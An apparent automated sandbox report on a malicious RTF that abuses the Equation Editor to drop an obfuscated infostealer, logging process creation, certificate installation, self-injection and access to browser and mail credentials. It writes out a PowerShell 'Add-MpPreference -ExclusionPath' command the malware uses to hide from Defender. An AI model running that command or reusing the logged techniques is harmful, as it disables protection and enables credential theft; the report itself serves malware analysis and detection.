                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Process created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: wow64win.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: wow64cpu.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: msi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: cryptsp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: rpcrtremote.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: dwmapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: version.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: secur32.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: winhttp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: webio.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: iphlpapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: winnsi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: dnsapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: nlaapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: dhcpcsvc6.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: dhcpcsvc.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: bcrypt.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: riched20.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: shfolder.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: bcrypt.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: webio.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: credssp.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: rpcrtremote.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Section loaded: gpapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: wow64win.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: wow64cpu.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: msi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: cryptsp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: rpcrtremote.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Section loaded: dwmapi.dll
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                Source: Xkl0PnD8zFPjfh1.wiz.LNK.0.dr, LNK file: ..\..\..\..\..\Desktop\Xkl0PnD8zFPjfh1.wiz.rtf
                Source: Window Recorder, Window detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

                Data Obfuscation

                Source: 5.2.wealthcharliebgk.exe.36b4c30.3.raw.unpack, RMQW4BFBjZuxJDH8DI.cs, .Net Code: mKLRMTo664 System.Reflection.Assembly.Load(byte[])
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, RMQW4BFBjZuxJDH8DI.cs, .Net Code: mKLRMTo664 System.Reflection.Assembly.Load(byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_0065C264 pushad ; retn 0065h 2_2_0065C289
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_0064F962 push ss; retf 2_2_0064F968
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_0065E170 push eax; retf 2_2_0065E171
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_0066574A push esp; ret 2_2_0066574B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_00665752 push esp; ret 2_2_00665753
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_0064F724 push D1366233h; retf 2_2_0064F74B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_00665022 push ebp; ret 2_2_00665023
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_0065C333 push A00065C4h; ret 2_2_0065C3F5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_00665000 push ebp; ret 2_2_0066501B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_0065C2DC pushad ; retn 0065h 2_2_0065C2DD
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_0065C3A4 push A00065C4h; ret 2_2_0065C3F5
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Code function: 8_2_005C90F8 pushfd ; retn 0046h 8_2_005C90F9
                Source: Xkl0PnD8zFPjfh1[1].exe.2.dr, Static PE information: section name: .text entropy: 7.973674679301799
                Source: wealthcharliebgk.exe.2.dr, Static PE information: section name: .text entropy: 7.973674679301799
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, kbVRJyGEL5y0oi0u8w.csHigh entropy of concatenated method names: 'Dispose', 'EjtOnl9RMx', 'vP60JIVl9g', 'rOt7xETrkB', 'tvGO5de5BG', 'hWLOzgT60A', 'ProcessDialogKey', 'dNa0ISgky6', 'XpD0OcSfTs', 'su000chtdn'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, iEcxvpukSVQdOZVxAA.csHigh entropy of concatenated method names: 'RN2scPBQFq', 'eM5shKHXuF', 'X9KsMyFKme', 'nL9s7faCD4', 'zeisBSNJy6', 'o1qsZoI3C6', 'U03sHxpkDJ', 'PqFs85yP5j', 'tWpsSq0C2w', 'J0EsegtLv6'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, fFrPugOIr6F0NahewZZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XdfQphMnRo', 'MRZQCTAgFF', 'dMGQ2E6Mba', 'pl7Qo2aDTy', 'xoCQfV29SZ', 'kWYQPDwvJg', 'UBNQNLtAqi'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, n86m6g2LgDMLIrOLOh.csHigh entropy of concatenated method names: 'f7EE8N1cOP', 'FpQESTZv1K', 'uuGEwnarWt', 'ko3EJKQ1tf', 'WvrEUuU4T5', 'ypQETc6Pl4', 'AKhE3f6be7', 'V2dEgfhQfA', 'YL3EiYUCsy', 'e83EprmSLM'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, xhtdn452GTCfESQUGv.csHigh entropy of concatenated method names: 'lkiQd1Xkri', 'VEgQXI9r85', 'cXfQqx04c7', 'yFGQsw3kv2', 'udDQWuKX1v', 'zbhQFoDpJg', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, TU4Cp2RapkVHJaYXP6.csHigh entropy of concatenated method names: 'zgKOs2NTuI', 'LGIOFSjPPY', 'pC5Ol696Jm', 'BYrOt5RtKe', 'cvBOYLAytJ', 'TlJOV8vFTN', 'I7d8pqh1OZGV8T3qdK', 'gX4As9voPdmYplVuRU', 'DYdOOAv81g', 'GH2OroUQjF'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, x0XCxBoZ0VvJ6ROlJR.csHigh entropy of concatenated method names: 'FDLYic61K5', 'OqWYCvCTIi', 'o52Yokwbn9', 'p0gYfnpOcS', 'HuLYJC5sV6', 'OV4YvU0nog', 'ycFYUqtDbq', 'mcfYTvtspX', 'aRQYbwbibW', 'lWXY3cgWq7'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, RMQW4BFBjZuxJDH8DI.csHigh entropy of concatenated method names: 'KkXr6PqgUP', 'uWlrmpWI4Y', 'zOfrGtBSw8', 'PtxrdGKTEl', 'xjCrXvi4tS', 'FCJrqMPWkd', 'Gr8rsi8rwj', 'SJ9rFciKUM', 'Gmsrj7OMXY', 'MhRrl9ZF2P'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, BP8YSHNXVPporwPd4V.csHigh entropy of concatenated method names: 'YDXAl3x7YT', 'iyeAta3eQA', 'ToString', 'tx9AmoO0NS', 'nb1AGyyQ1J', 'IL8Ade4jQU', 'mLLAXcJYX6', 'gMdAqX7kWu', 'YcEAsLrEaK', 'CLkAF4kNDN'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, bn4TrYUsuwJQmmd254.csHigh entropy of concatenated method names: 'f1FqkDxIpc', 'M5lqcHc3Ou', 'gN6qMm0NJB', 'wpbq7p2ANO', 'E8uqZy52ZE', 'e2JqHYryTV', 'dfcqS21inh', 'xmaqePjGOF', 'XUBmOq9V2yow1pTjInZ', 'iDcE4D9W4EnuZxQvFBj'
                Source: 5.2.wealthcharliebgk.exe.5620000.6.raw.unpack, iAfNRMLCf8jtl9RMxx.csHigh entropy of concatenated method names: 'bxNWYgM37c', 'piNWAVXo4u', 'trWWWsW8B9', 'EG6WxZgVnF', 'QRlW91P18c', 'UcrWkmDSvr', 'Dispose', 'Jfq4mccBRP', 'YRj4GviwBp', 'nDu4dpOipT'

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Memory allocated: 480000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Memory allocated: 23F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Memory allocated: B20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Memory allocated: 7E20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Memory allocated: 5860000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Memory allocated: 8E20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Memory allocated: 5A40000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Memory allocated: 240000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Memory allocated: 630000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Thread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2283
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3570
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Window / User API: threadDelayed 9606
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3620 Thread sleep time: -120000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 3776 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3972 Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3984 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3880 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 4008 Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 4028 Thread sleep time: -19369081277395017s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 4028 Thread sleep time: -8400000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 4032 Thread sleep count: 210 > 30
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 4032 Thread sleep count: 9606 > 30
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3088 Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Memory written: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe base: 400000 value starts with: 4D5A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Process created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe Queries volume information: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: wealthcharliebgk.exe PID: 3756, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: wealthcharliebgk.exe PID: 3860, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

                Remote Access Functionality

                Source: Yara match File source: 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: wealthcharliebgk.exe PID: 3756, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: wealthcharliebgk.exe PID: 3860, type: MEMORYSTR
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
